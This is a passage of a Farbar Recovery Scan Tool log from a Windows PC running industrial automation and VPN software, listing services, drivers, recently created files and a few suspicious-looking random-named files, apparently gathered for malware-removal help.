R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)

R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-11-13] (Intel Corporation)

R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-11-13] (Intel Corporation)

S3 LogReceiver; C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\LogReceiver.exe [80232 2011-11-22] (Rockwell Automation, Inc.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 MSSQL$FTVIEWX64TAGDB; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\sqlservr.exe [42884448 2010-04-03] (Microsoft Corporation)

R2 MSSQL$SUNBELT; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)

R2 Rockwell HMI Diagnostics; C:\Program Files (x86)\Rockwell Software\RSView Enterprise\HMIDIAGNOSTICSLSTADAPT.exe [106344 2011-07-26] (Rockwell Automation, Inc.)

R2 Rockwell Tag Server; C:\Program Files (x86)\Rockwell Software\RSView Enterprise\TagSrv.exe [212328 2011-07-26] (Rockwell Automation, Inc.)

S3 RSLinx; C:\Program Files (x86)\Rockwell Software\RSLinx\RSLINX.EXE [2010488 2012-09-14] (Rockwell Automation, Inc.)

R2 RSLinxNG; C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\RSLinxNG.exe [246120 2011-11-22] (Rockwell Automation, Inc.)

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [223816 2013-01-09] (Realtek Semiconductor)

S3 SimModuleService; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\SimModuleService.exe [95232 2012-06-05] () [File not signed]

R2 SONICWALL_NetExtender; C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEService64.exe [498560 2010-06-22] (SonicWALL Inc.)

S4 SQLAgent$FTVIEWX64TAGDB; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\SQLAGENT.EXE [367456 2010-04-03] (Microsoft Corporation)

R2 TgbIke Starter; C:\Windows\SysWOW64\TgbStarter.exe [239280 2011-11-15] (TheGreenBow)

R2 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [2179056 2013-07-19] (GlavSoft LLC.)

R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [14407384 2014-06-12] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36520 2012-09-13] (Advanced Micro Devices, Inc.)

R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)

R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-08-30] (Intel Corporation)

R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [2143432 2013-04-09] (Realtek Semiconductor Corp.)

S3 irstrtdv; C:\Windows\system32\drivers\irstrtdv.sys [43800 2013-03-21] (Intel Corporation)

R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)

R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-11-13] (Intel Corporation)

R3 NxDrv; C:\Windows\System32\DRIVERS\NxDrv.sys [24264 2009-10-21] (SonicWALL Inc.)

R3 O2FJ2RDR; C:\Windows\System32\DRIVERS\O2FJ2w7x64.sys [185760 2013-05-07] (O2Micro )

S3 RAUSBCIP; C:\Windows\System32\drivers\rausbcipwdf.sys [87552 2011-11-07] (Rockwell Automation, Inc.)

R1 SBRE; C:\Windows\system32\drivers\SBREdrv.sys [45656 2010-01-20] (Sunbelt Software)

S3 ST7007; C:\Windows\system32\drivers\ST7007.sys [69896 2013-02-21] (STMicroelectronics)

R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_Accel.sys [89312 2013-03-27] (STMicroelectronics)

R3 TGBMPEnum; C:\Windows\System32\DRIVERS\TGBMPEnum.sys [40624 2011-11-15] (TheGreenBow)

R3 TGBVPNVirtM; C:\Windows\System32\DRIVERS\TGBVPNVirtM.sys [140464 2011-11-15] (TheGreenBow)

S3 USA19H; C:\Windows\System32\DRIVERS\USA19Hx64.sys [740096 2007-10-30] (Keyspan)

S3 USA19HP; C:\Windows\System32\DRIVERS\USA19Hx64p.SYS [35840 2007-10-23] (Keyspan)

S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2011-03-24] (Microsoft Corporation) [File not signed]

S3 usbuhci; C:\Windows\system32\drivers\usbuhci.sys [30720 2011-03-24] (Microsoft Corporation) [File not signed]

R1 VirtualBackplane; C:\Windows\System32\Drivers\VirtualBackplane.sys [51200 2011-06-02] (Rockwell Automation)

R3 vmkbd2; C:\Windows\system32\drivers\VMkbd.sys [33496 2014-06-12] (VMware, Inc.)

R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [32472 2014-06-12] (VMware, Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-mntapi20-shared.sys [33872 2013-02-22] (VMware, Inc.)

S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]

S3 pcidnt; \SystemRoot\System32\Drivers\pcidnt.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

 

 

==================== One Month Created Files and Folders ========

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-05 13:45 - 2014-11-05 13:45 - 00000113 _____ () C:\Users\Mark\Desktop\TMS.csv

2014-11-05 13:44 - 2014-11-05 13:44 - 00000309 _____ () C:\Users\Mark\Downloads\TMS.csv

2014-11-05 08:39 - 2014-11-05 08:39 - 00000028 _____ () C:\Windows\SysWOW64\u

2014-11-05 08:38 - 2014-11-05 08:38 - 00071168 _____ () C:\Windows\system32\tlttzup.dll

2014-11-05 08:38 - 2014-11-05 08:38 - 00003860 _____ () C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C}

2014-11-05 08:38 - 2014-11-05 08:38 - 00000000 _____ () C:\Windows\system32\yvgmc.dll

2014-11-05 08:21 - 2014-11-05 08:21 - 00000000 ____D () C:\Users\Mark\Desktop\FRST-OlderVersion

2014-11-05 08:13 - 2014-11-05 08:14 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.6

2014-11-04 11:55 - 2014-11-04 11:12 - 19828376 _____ (Malwarebytes Corporation ) C:\mbam-setup-2.0.3.1025.exe

2014-11-04 11:12 - 2014-11-04 11:12 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Mark\Downloads\mbam-setup-2.0.3.1025.exe

2014-11-01 08:59 - 2014-11-01 08:59 - 922953262 _____ () C:\Windows\MEMORY.DMP

2014-11-01 08:59 - 2014-11-01 08:59 - 00284128 _____ () C:\Windows\Minidump\110114-22760-01.dmp

2014-11-01 08:59 - 2014-11-01 08:59 - 00000000 ____D () C:\Windows\Minidump

2014-10-31 20:01 - 2014-10-31 20:01 - 00000000 ____D () C:\Users\Mark\AppData\Local\YWPack

2014-10-31 13:41 - 2014-11-05 15:51 - 00001008 _____ () C:\Windows\setupact.log

2014-10-31 13:41 - 2014-10-31 13:41 - 00000000 _____ () C:\Windows\setuperr.log

2014-10-31 12:55 - 2014-11-03 22:34 - 00000000 ___HD () C:\383d109

2014-10-29 07:16 - 2014-10-29 20:48 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\0CEB3AF1.sys

2014-10-28 09:14 - 2014-11-05 08:24 - 00000970 _____ () C:\Users\Mark\Desktop\Addition.txt

2014-10-28 09:13 - 2014-11-05 16:34 - 00031640 _____ () C:\Users\Mark\Desktop\FRST.txt

2014-10-28 09:13 - 2014-11-05 16:33 - 00000000 ____D () C:\FRST

2014-10-28 09:13 - 2014-11-05 08:21 - 02114560 _____ (Farbar) C:\Users\Mark\Desktop\FRST64.exe

2014-10-27 14:56 - 2014-10-28 07:22 - 00000000 ____D () C:\Program Files (x86)\ACTi Corporation

2014-10-27 14:56 - 2014-10-27 14:59 - 00000000 ____D () C:\Users\Mark\AppData\Local\NVR3 Workstation

2014-10-27 14:55 - 2014-10-27 14:55 - 00000000 ____D () C:\Users\Mark\Desktop\NVR_3_Workstation_for_Windows_Software_V.3.0.09.16_20140627

2014-10-27 14:53 - 2014-10-27 14:53 - 00000000 ____D () C:\Users\Mark\Documents\NVR_3_Workstation_for_Windows_Software_V.3.0.09.16_20140627

2014-10-27 14:26 - 2014-10-27 14:26 - 00008913 _____ () C:\Users\Mark\Desktop\LiveDemoSample.htm

2014-10-27 14:24 - 2014-10-27 14:24 - 00000000 ____D () C:\Users\Mark\Downloads\LiveDemoSampleFiles_20110630_001

2014-10-27 14:20 - 2014-10-27 14:20 - 00008913 _____ () C:\Users\Mark\Downloads\LiveDemoSampleFiles_20110630_001.zip

2014-10-27 13:11 - 2014-10-27 13:11 - 00000000 ____D () C:\Users\Mark\Documents\IP_Utility_V.4.3.08_20140702

2014-10-24 18:51 - 2014-10-24 18:51 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\Apple Computer

2014-10-24 08:48 - 2014-10-24 08:48 - 00001891 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\ProgramData\Apple Computer

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\Program Files (x86)\QuickTime

2014-10-24 08:47 - 2014-10-24 08:47 - 00000000 ____D () C:\Users\Mark\AppData\Local\Apple

2014-10-24 08:47 - 2014-10-24 08:47 - 00000000 ____D () C:\ProgramData\Apple

2014-10-24 08:46 - 2014-10-24 08:47 - 39401336 _____ (Apple Inc.) C:\Users\Mark\Downloads\QuickTimeInstaller.exe

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HMS

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\ProgramData\HMS

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\Program Files (x86)\HMS

2014-10-15 14:31 - 2014-10-09 20:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll

2014-10-15 14:31 - 2014-10-09 20:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2014-10-15 14:31 - 2014-10-09 20:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2014-10-15 14:31 - 2014-10-06 20:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll

2014-10-15 14:31 - 2014-10-06 20:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll

2014-10-15 14:31 - 2014-09-28 18:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2014-10-15 14:31 - 2014-09-25 16:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll

2014-10-15 14:31 - 2014-09-25 16:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2014-10-15 14:31 - 2014-09-25 16:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl

2014-10-15 14:31 - 2014-09-25 16:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2014-10-15 14:31 - 2014-09-18 20:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2014-10-15 14:31 - 2014-09-18 19:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2014-10-15 14:31 - 2014-09-18 19:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll

2014-10-15 14:31 - 2014-09-18 19:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2014-10-15 14:31 - 2014-09-18 19:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2014-10-15 14:31 - 2014-09-18 19:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2014-10-15 14:31 - 2014-09-18 19:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll

2014-10-15 14:31 - 2014-09-18 19:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll

2014-10-15 14:31 - 2014-09-18 19:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll

2014-10-15 14:31 - 2014-09-18 19:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2014-10-15 14:31 - 2014-09-18 19:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2014-10-15 14:31 - 2014-09-18 19:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll

2014-10-15 14:31 - 2014-09-18 19:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

2014-10-15 14:31 - 2014-09-18 19:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2014-10-15 14:31 - 2014-09-18 19:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2014-10-15 14:31 - 2014-09-18 19:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll

2014-10-15 14:31 - 2014-09-18 19:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe

2014-10-15 14:31 - 2014-09-18 19:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe

2014-10-15 14:31 - 2014-09-18 19:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb

2014-10-15 14:31 - 2014-09-18 19:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2014-10-15 14:31 - 2014-09-18 19:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll

2014-10-15 14:31 - 2014-09-18 19:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll

2014-10-15 14:31 - 2014-09-18 19:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2014-10-15 14:31 - 2014-09-18 18:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll

2014-10-15 14:31 - 2014-09-18 18:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2014-10-15 14:31 - 2014-09-18 18:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll

2014-10-15 14:31 - 2014-09-18 18:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll

2014-10-15 14:31 - 2014-09-18 18:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll

2014-10-15 14:31 - 2014-09-18 18:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll

2014-10-15 14:31 - 2014-09-18 18:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe

2014-10-15 14:31 - 2014-09-18 18:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll

2014-10-15 14:31 - 2014-09-18 18:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2014-10-15 14:31 - 2014-09-18 18:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe

2014-10-15 14:31 - 2014-09-18 18:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll

2014-10-15 14:31 - 2014-09-18 18:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll

2014-10-15 14:31 - 2014-09-18 18:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2014-10-15 14:31 - 2014-09-18 18:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll

2014-10-15 14:31 - 2014-09-18 18:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2014-10-15 14:31 - 2014-09-18 18:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll

2014-10-15 14:31 - 2014-09-18 18:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2014-10-15 14:31 - 2014-09-18 17:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2014-10-15 14:31 - 2014-09-18 17:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2014-10-15 14:31 - 2014-09-18 17:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2014-10-15 14:31 - 2014-09-18 17:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

2014-10-15 14:30 - 2014-09-17 20:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll

2014-10-15 14:30 - 2014-09-17 19:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll

2014-10-15 14:30 - 2014-09-12 19:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll

2014-10-15 14:30 - 2014-09-12 19:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

2014-10-15 14:30 - 2014-09-03 23:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll

2014-10-15 14:30 - 2014-09-03 23:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe

2014-10-15 14:30 - 2014-07-16 20:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe

2014-10-15 14:30 - 2014-07-16 20:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2014-10-15 14:30 - 2014-07-16 19:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe

2014-10-15 14:30 - 2014-07-16 19:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2014-10-15 14:30 - 2014-07-16 19:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys

2014-10-15 14:30 - 2014-07-16 19:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys

2014-10-15 13:10 - 2014-10-15 13:37 - 00000816 _____ () C:\Users\Mark\Desktop\Harwood delete.txt

 

==================== One Month Modified Files and Folders =======

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-05 16:31 - 2014-04-25 20:31 - 00000911 _____ () C:\Windows\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job

2014-11-05 16:31 - 2014-04-25 20:31 - 00000725 _____ () C:\Windows\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job

2014-11-05 16:30 - 2014-04-29 11:00 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-05 16:29 - 2014-04-03 11:22 - 00002018 ____H () C:\Users\Mark\Documents\Default.rdp

2014-11-05 16:26 - 2014-04-10 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-05 16:02 - 2014-04-04 07:19 - 00000000 ____D () C:\Users\Mark\AppData\Local\SugarSync

2014-11-05 14:38 - 2014-05-14 15:00 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-11-05 08:22 - 2009-07-13 23:13 - 00979824 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-05 08:21 - 2009-07-13 22:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-05 08:21 - 2009-07-13 22:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-05 08:14 - 2014-04-30 13:51 - 00000000 ____D () C:\ProgramData\VMware

2014-11-05 08:14 - 2014-04-16 07:15 - 00018200 _____ () C:\WindowsPODIUM.LOG

2014-11-05 08:13 - 2014-04-29 11:00 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2014-11-05 08:12 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-11-04 20:57 - 2014-04-21 14:34 - 00000000 ____D () C:\Program Files (x86)\Steam

2014-11-04 20:17 - 2014-04-03 20:04 - 00000000 ____D () C:\Users\Mark\Desktop\pics

2014-11-03 14:52 - 2014-04-03 09:31 - 00000000 ____D () C:\Users\Mark\AppData\Local\CrashDumps

2014-11-02 09:51 - 2010-11-20 21:47 - 00217722 _____ () C:\Windows\PFRO.log

2014-11-01 09:19 - 2014-03-20 10:43 - 00000000 ____D () C:\ProgramData\Sonic

2014-10-31 20:06 - 2014-04-23 07:33 - 00000000 __SHD () C:\Users\Mark\AppData\Local\EmieUserList

2014-10-31 20:06 - 2014-04-23 07:33 - 00000000 __SHD () C:\Users\Mark\AppData\Local\EmieSiteList

2014-10-31 12:55 - 2014-03-20 10:29 - 01949165 _____ () C:\Windows\WindowsUpdate.log

2014-10-29 13:38 - 2014-04-10 09:02 - 00000028 _____ () C:\Windows\ODBC.INI

2014-10-29 12:12 - 2014-09-26 07:57 - 00000000 ____D () C:\ProgramData\Package Cache

2014-10-29 12:12 - 2014-04-21 15:07 - 00000000 ____D () C:\Users\Mark\Documents\My Games

2014-10-29 12:12 - 2014-04-21 15:07 - 00000000 ____D () C:\Users\Mark\AppData\Local\My Games

2014-10-29 12:12 - 2014-03-20 10:41 - 00257666 _____ () C:\Windows\DirectX.log

2014-10-29 07:15 - 2014-04-16 07:15 - 00000085 _____ () C:\Windows\FW.INI

2014-10-28 12:05 - 2014-05-29 11:50 - 00000000 ____D () C:\Users\Mark\AppData\Local\VMware

2014-10-28 12:05 - 2014-05-01 08:23 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\VMware

2014-10-28 09:17 - 2014-08-15 13:34 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\BitTorrent

2014-10-28 07:23 - 2014-09-11 09:58 - 00000000 ____D () C:\Program Files (x86)\Citrix

2014-10-28 07:22 - 2014-03-20 10:36 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information

2014-10-28 05:34 - 2010-11-20 21:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2014-10-27 10:57 - 2014-04-10 12:48 - 00000000 ____D () C:\Data

2014-10-22 13:24 - 2014-05-13 09:22 - 00000108 _____ () C:\Windows\RADrvDLX.INI

2014-10-21 15:10 - 2014-05-14 15:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-10-21 15:10 - 2014-05-14 15:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware

2014-10-17 14:03 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\rescache

2014-10-16 19:25 - 2014-04-29 11:00 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-16 19:25 - 2014-04-29 11:00 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-16 07:17 - 2009-07-13 22:45 - 00551016 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-10-16 07:14 - 2014-05-06 10:15 - 00000000 ___SD () C:\Windows\system32\CompatTel

2014-10-15 16:17 - 2014-04-03 15:42 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-15 16:10 - 2014-04-07 13:16 - 00000000 ____D () C:\Windows\system32\MRT

2014-10-15 16:08 - 2014-04-07 13:16 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

2014-10-15 11:08 - 2014-05-21 07:50 - 00000460 _____ () C:\Users\Mark\Documents\RALinxDriverServer.err

2014-10-12 17:14 - 2014-04-03 20:46 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\.minecraft

 

Some content of TEMP:

====================

C:\Users\Mark\AppData\Local\Temp\stuprt.exe

 

 

==================== Bamital & volsnap Check =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2014-10-27 10:16

 

==================== End Of Log ============================


Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
